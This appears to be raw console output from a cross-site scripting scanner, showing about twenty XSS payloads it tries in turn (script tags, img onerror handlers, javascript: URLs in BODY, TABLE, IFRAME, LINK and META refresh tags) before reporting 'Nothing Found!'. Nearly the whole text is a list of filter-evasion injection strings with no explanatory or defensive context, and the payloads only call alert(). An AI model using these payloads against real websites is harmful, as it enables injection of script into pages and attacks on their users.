<h1>Pyhton</h1>

Working...
Testing with payload> "; alert('XSS')//
Testing with payload> ">&ltscript>alert('XSS')&lt/script>
...
Testing with payload> ">&ltimg id=XSS SRC=x onerror=alert(XSS);>
...
Testing with payload> ">&ltIMG id=XSS SRC="javascript:alert('XSS');">
...
Testing with payload> ">&ltIMG """>&ltSCRIPT>alert("XSS")&lt/SCRIPT>">
...
Testing with payload> ">&ltBODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
...
Testing with payload> ">&ltSCRIPT>alert(/XSS/.source)&lt/SCRIPT>
...
Testing with payload> ">&ltBODY BACKGROUND="javascript:alert('XSS')">
...
Testing with payload> ">&lt/TITLE>&ltSCRIPT>alert("XSS");&lt/SCRIPT>
...
Testing with payload> ">&ltINPUT TYPE="IMAGE" id=XSS SRC="javascript:alert('XSS');">
...
Testing with payload> ">&ltBODY ONLOAD=alert('XSS')>
...
Testing with payload> ">&ltLINK REL="stylesheet" HREF="javascript:alert('XSS');">
...
Testing with payload> ">&ltMETA HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
...
Testing with payload> ">&ltTABLE id=XSS BACKGROUND="javascript:alert('XSS')">
...
Testing with payload> ">&ltTABLE id=XSS>&ltTD BACKGROUND="javascript:alert('XSS')">
...
Testing with payload> ">&ltDIV id=XSS STYLE="background-image: url(javascript:alert('XSS'))">
...
Testing with payload> ">&ltIFRAME id=XSS SRC="javascript:alert('XSS');">&lt/IFRAME>
...
Testing with payload> ">&ltFRAMESET>&ltFRAME id=XSS SRC="javascript:alert('XSS');">&lt/FRAMESET>
...
Testing with payload> ">&ltTABLE BACKGROUND="javascript:alert('XSS')">
...
...

	Nothing Found! 

Time taken : 21.94 seconds
